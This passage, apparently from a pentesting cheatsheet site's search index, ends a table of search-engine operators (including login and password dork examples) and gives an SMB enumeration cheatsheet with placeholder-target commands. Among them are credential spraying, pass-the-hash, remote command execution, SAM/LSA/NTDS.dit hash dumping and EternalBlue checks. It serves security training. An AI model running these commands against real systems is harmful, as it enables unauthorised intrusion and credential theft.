sites\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003erelated:example.com\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003elink:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003ePages linking to a URL (deprecated/limited)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003elink:example.com\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003edefine:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDictionary definition\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003edefine:reconnaissance\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eAROUND(n)\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTerms within n words of each other\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eadmin AROUND(3) password\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 
id=\"operator-modifiers\"\u003eOperator Modifiers\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eModifier\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eExample\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e\u0026quot;...\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExact phrase match\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e\u0026quot;confidential\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eExclude a term\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:example.com -www\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eOR\u003c/code\u003e / \u003ccode\u003e|\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eLogical OR\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:example.com (filetype:pdf OR filetype:docx)\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eAND\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eLogical AND (implicit)\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eintitle:login AND inurl:admin\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e*\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWildcard / placeholder\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e\u0026quot;username * password\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e( )\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eGroup 
terms\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003esite:example.com (admin OR login)\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e..\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eNumber range\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e\u0026quot;budget 2020..2024\u0026quot;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003chr\u003e\n\u003ch2 id=\"all-variants\"\u003e\u0026ldquo;all\u0026rdquo; Variants\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eOperator\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eallintitle:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAll following words must be in the title\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eallinurl:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAll following words must be in the URL\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eallintext:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAll following words must be in the body\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003eallinanchor:\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eAll following words must be in anchor text\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/tbody\u003e\n\u003c/table\u003e\n\u003cblockquote\u003e\n\u003cp\u003eNote: \u003ccode\u003eall*\u003c/code\u003e operators don\u0026rsquo;t mix well with other operators — use the single-term versions (\u003ccode\u003eintitle:\u003c/code\u003e, \u003ccode\u003einurl:\u003c/code\u003e) when combining.\u003c/p\u003e","title":"Search 
Operators"},{"content":"SMB Enumeration Cheatsheet Default Ports: 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP)\nInitial Scanning nmap -p 139,445 -sV \u0026lt;ip\u0026gt; nmap -p 445 --script smb-os-discovery \u0026lt;ip\u0026gt; nmap -p 445 --script smb-security-mode \u0026lt;ip\u0026gt; nmap -p 445 --script smb2-security-mode \u0026lt;ip\u0026gt; nmap -p 139,445 --script smb-* \u0026lt;ip\u0026gt; # All SMB scripts nmap -p 445 --script smb-vuln-* \u0026lt;ip\u0026gt; # All vuln checks NetBIOS / NBT Scanning nbtscan \u0026lt;ip\u0026gt; nbtscan -r 192.168.1.0/24 nmblookup -A \u0026lt;ip\u0026gt; enum4linux / enum4linux-ng # Classic enum4linux -a \u0026lt;ip\u0026gt; # All checks enum4linux -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; \u0026lt;ip\u0026gt; # Authenticated enum4linux -S \u0026lt;ip\u0026gt; # Shares only enum4linux -U \u0026lt;ip\u0026gt; # Users only enum4linux -P \u0026lt;ip\u0026gt; # Password policy # Newer (recommended) enum4linux-ng -A \u0026lt;ip\u0026gt; enum4linux-ng -A \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; enum4linux-ng -A \u0026lt;ip\u0026gt; -oA output smbclient # List shares smbclient -L //\u0026lt;ip\u0026gt;/ -N # Null session smbclient -L //\u0026lt;ip\u0026gt;/ -U \u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt; # Authenticated # Connect to share smbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -N smbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -U \u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt; smbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -U \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt; # Within smbclient shell ls # List files cd \u0026lt;dir\u0026gt; # Change directory get \u0026lt;file\u0026gt; # Download file put \u0026lt;file\u0026gt; # Upload file recurse ON # Enable recursive operations prompt OFF # Disable prompts mget * # Download everything mput * # Upload everything CrackMapExec (CME) # Basic info crackmapexec smb \u0026lt;ip\u0026gt; 
crackmapexec smb 192.168.1.0/24 # Authenticated enum crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --shares crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --users crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --groups crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --sessions crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --loggedon-users crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --local-groups # Credential spraying crackmapexec smb 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --continue-on-success # Pass-the-Hash crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt; # Command execution crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u0026#39;whoami\u0026#39; # CMD crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u0026#39;whoami\u0026#39; # PowerShell # Dump SAM/LSA crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --sam crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --lsa crackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -M ntdsutil # NTDS.dit impacket Tools python3 smbclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; python3 samrdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; python3 rpcdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; python3 lookupsid.py 
\u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; python3 secretsdump.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; # Dump all hashes python3 secretsdump.py -just-dc-ntlm \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt; Mounting SMB Shares # Linux mount sudo mount -t cifs //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; /mnt/smb -o username=\u0026lt;user\u0026gt;,password=\u0026lt;pass\u0026gt; sudo mount -t cifs //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; /mnt/smb -o username=\u0026lt;user\u0026gt;,password=\u0026lt;pass\u0026gt;,domain=\u0026lt;domain\u0026gt; Key Vulnerabilities CVE Name Description CVE-2017-0144 EternalBlue / MS17-010 SMBv1 RCE — WannaCry / NotPetya CVE-2020-0796 SMBGhost SMBv3.1.1 compression RCE CVE-2021-34527 PrintNightmare Print Spooler RCE via SMB # EternalBlue check nmap -p 445 --script smb-vuln-ms17-010 \u0026lt;ip\u0026gt; use auxiliary/scanner/smb/smb_ms17_010 # SMBGhost check nmap -p 445 --script smb-vuln-cve2020-0796 \u0026lt;ip\u0026gt; use auxiliary/scanner/smb/cve_2020_0796_smbghost ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/smb/","summary":"\u003ch1 id=\"smb-enumeration-cheatsheet\"\u003eSMB Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Ports:\u003c/strong\u003e 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"initial-scanning\"\u003eInitial Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 139,445 -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 
\u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-os-discovery \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-security-mode \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb2-security-mode \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p 139,445 --script smb-* \u0026lt;ip\u0026gt;              \u003cspan style=\"color:#75715e\"\u003e# All SMB scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e445\u003c/span\u003e --script smb-vuln-* \u0026lt;ip\u0026gt;             \u003cspan style=\"color:#75715e\"\u003e# All vuln checks\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"netbios--nbt-scanning\"\u003eNetBIOS / NBT Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enbtscan \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enbtscan -r 192.168.1.0/24\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmblookup -A \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"enum4linux--enum4linux-ng\"\u003eenum4linux / enum4linux-ng\u003c/h2\u003e\n\u003cdiv 
class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Classic\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -a \u0026lt;ip\u0026gt;                               \u003cspan style=\"color:#75715e\"\u003e# All checks\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; \u0026lt;ip\u0026gt;              \u003cspan style=\"color:#75715e\"\u003e# Authenticated\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -S \u0026lt;ip\u0026gt;                               \u003cspan style=\"color:#75715e\"\u003e# Shares only\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -U \u0026lt;ip\u0026gt;                               \u003cspan style=\"color:#75715e\"\u003e# Users only\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux -P \u0026lt;ip\u0026gt;                               \u003cspan style=\"color:#75715e\"\u003e# Password policy\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Newer (recommended)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux-ng -A \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux-ng -A \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eenum4linux-ng -A \u0026lt;ip\u0026gt; -oA output\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"smbclient\"\u003esmbclient\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# List shares\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmbclient -L //\u0026lt;ip\u0026gt;/ -N                          \u003cspan style=\"color:#75715e\"\u003e# Null session\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmbclient -L //\u0026lt;ip\u0026gt;/ -U \u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt;            \u003cspan style=\"color:#75715e\"\u003e# Authenticated\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect to share\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -N\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003esmbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -U \u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003esmbclient //\u0026lt;ip\u0026gt;/\u0026lt;share\u0026gt; -U \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;%\u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Within smbclient shell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003els                    \u003cspan style=\"color:#75715e\"\u003e# List files\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecd \u0026lt;dir\u0026gt;              \u003cspan style=\"color:#75715e\"\u003e# Change directory\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eget \u0026lt;file\u0026gt;            \u003cspan style=\"color:#75715e\"\u003e# Download file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eput \u0026lt;file\u0026gt;            \u003cspan style=\"color:#75715e\"\u003e# Upload file\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erecurse ON            \u003cspan style=\"color:#75715e\"\u003e# Enable recursive operations\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eprompt OFF            \u003cspan style=\"color:#75715e\"\u003e# Disable prompts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emget *                \u003cspan style=\"color:#75715e\"\u003e# Download everything\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emput *                \u003cspan style=\"color:#75715e\"\u003e# Upload 
everything\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"crackmapexec-cme\"\u003eCrackMapExec (CME)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Basic info\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb 192.168.1.0/24\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Authenticated enum\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --shares\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --users\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --groups\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p 
\u0026lt;pass\u0026gt; --sessions\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --loggedon-users\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --local-groups\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Credential spraying\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb 192.168.1.0/24 -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --continue-on-success\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Pass-the-Hash\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -H \u0026lt;nthash\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Command execution\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -x \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e       \u003cspan style=\"color:#75715e\"\u003e# CMD\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan 
style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -X \u003cspan style=\"color:#e6db74\"\u003e\u0026#39;whoami\u0026#39;\u003c/span\u003e       \u003cspan style=\"color:#75715e\"\u003e# PowerShell\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Dump SAM/LSA\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --sam\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; --lsa\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ecrackmapexec smb \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -p \u0026lt;pass\u0026gt; -M ntdsutil       \u003cspan style=\"color:#75715e\"\u003e# NTDS.dit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"impacket-tools\"\u003eimpacket Tools\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 smbclient.py \u0026lt;domain\u0026gt;/\u0026lt;user\u0026gt;:\u0026lt;pass\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 samrdump.py 
